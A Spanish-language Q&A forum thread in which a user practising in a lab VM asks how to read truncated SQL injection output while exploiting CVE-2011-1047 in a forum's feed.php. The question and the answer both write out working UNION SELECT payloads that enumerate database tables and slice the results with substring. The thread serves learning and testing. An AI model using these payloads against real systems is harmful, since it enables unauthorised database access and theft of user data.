inyección de SQL en un espacio limitado

3

Esto podría parecer una pregunta noob. Actualmente estoy tratando de inyección SQL en una máquina virtual. Esto es lo que estoy tratando

union select group_concat(table_name) from information_schema.tables#

Y la inyección funciona. Pero la página que se devuelve es un archivo XML y cada etiqueta tiene un límite de tamaño, por lo que solo puedo ver la mitad de los resultados.

<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>

¿Hay alguna forma de imprimir la segunda mitad de los resultados? La tabla que necesito ver contiene la palabra "usuario". Si soy demasiado ambiguo, quiero hacer algo como:

  1. Organice las filas del resultado y luego group_concat it
  2. Rebana el resultado (como en string[10:] )
  3. Selecciona todas las filas después de tables_priv

Lo que ya intenté:

union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#

No se imprime nada. Pero esta consulta funciona cuando lo pruebo directamente en la máquina virtual de MySQL (después de omitir el 'union' y el '#').

union select group_concat(table_name) from information_schema.tables where table_name like 'user'#

No funcionó en la aplicación web ni directamente en MySQL de VM.

PS. Sé que sqlmap hará el trabajo por mí, pero quiero probar las cosas manualmente.

PPS. Estoy probando CVE-2011-1047 (parámetro de tema en feed.php)

    
pregunta BigFatProgrammer 12.01.2017 - 17:39
fuente

1 respuesta

2

Debe haber rutinas de manipulación de cadenas o algo en mysql. Entonces simplemente haces una

union select substring(group_concat(table_name),1,10) from information_schema.tables#

o algo así y luego ejecutas la consulta para cada sector ...

    
respondido por el kaidentity 12.01.2017 - 17:54
fuente

Lea otras preguntas en las etiquetas